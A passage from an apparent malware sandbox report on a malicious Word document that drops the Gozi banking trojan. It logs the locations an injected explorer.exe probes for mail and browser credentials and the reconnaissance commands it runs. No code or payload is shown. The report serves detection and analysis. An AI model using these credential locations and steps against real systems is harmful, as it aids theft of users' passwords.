Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail account<.oeaccount
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail account{*}.oeaccount
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup unknown
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new unknown
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *
Source: C:\Windows\explorer.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery unknown
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\explorer.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\prefs.js
Tries to steal Mail credentials (via file access)
Source: C:\Windows\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
Behavior Graph ID: 820806 | Sample: e41ZuYVo64.docm | Start date: 20/03/2019 | Architecture: WINDOWS | Score: 100
Process chain shown in the graph: WINWORD.EXE drops and starts text.doc.16147.scr, which drops avicbrkr.exe and injects into explorer.exe; the injected explorer.exe connects to the network, overwrites Firefox prefs.js, and starts cmd.exe (systeminfo.exe, nslookup.exe, net.exe, tasklist.exe, driverquery.exe) and avicbrkr.exe (detected as Gozi e-Banking trojan). The node and edge rendering of the graph is not recoverable as text.